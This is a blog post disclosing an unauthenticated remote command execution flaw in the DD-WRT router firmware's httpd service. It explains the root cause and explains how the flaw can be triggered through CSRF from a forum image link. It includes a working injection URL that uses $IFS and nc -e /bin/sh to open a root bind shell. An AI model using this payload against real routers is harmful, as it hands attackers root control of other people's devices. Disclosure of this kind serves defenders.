DD-WRT’ httpd service Remote Command Execution Vulnerability

Today I found a video demon­stra­tion of this vul­ner­a­bil­ity on Youtube. DD-WRT is free Linux-based firmware for sev­eral wire­less routers, most notably the Linksys WRT54G (includ­ing the WRT54GL and WRT54GS). It works on the lat­est release of DD-WRT (v24 sp1). Thanks Leka vecher, who dis­cov­ered this, I guess.

It looks pretty cool. Let’s watch it first. And then I’d like to share with you guys a bit about this vulnerability.

This bug is located in the httpd.c file, around line 859.

Three issues here:

• No metachar­ac­ters handling
• Com­mand gets exe­cuted even with­out suc­cess­ful authen­ti­ca­tion. You are not going to see any out­put if not authen­ti­cated though.
• httpd runs as root

To sum up, Any unau­then­ti­cated attacker that can con­nect to the man­age­ment web inter­face can get eas­ily root on the device via his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute(whitespaces break it)

Any­way, they can be eas­ily replaced with shell vari­able like $IFS. So as the attack video demo showed, get­ting root shell at 5555/tcp becomes as easy as typ­ing this in your browser’s url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

For­tu­nately, httpd is not acces­si­ble via pub­lic net­work by default. But as Leka mentioned

this vul­ner­a­bil­ity can be exploited via a CSRF attack (the dd-wrt device’s owner does not even need to have an authen­ti­cated ses­sion on the web UI which is bad, bad). How­ever, a base authen­ti­ca­tion dia­log will appear. In IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already doc­u­mented CSRF vul­ner­a­bil­ity ( http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authen­ti­cated ses­sion. This means some­one can even post some crafted [img] link on a forum and a dd-wrt router owner vis­it­ing the forum will get owned

Alright, that’s it. Be good do right!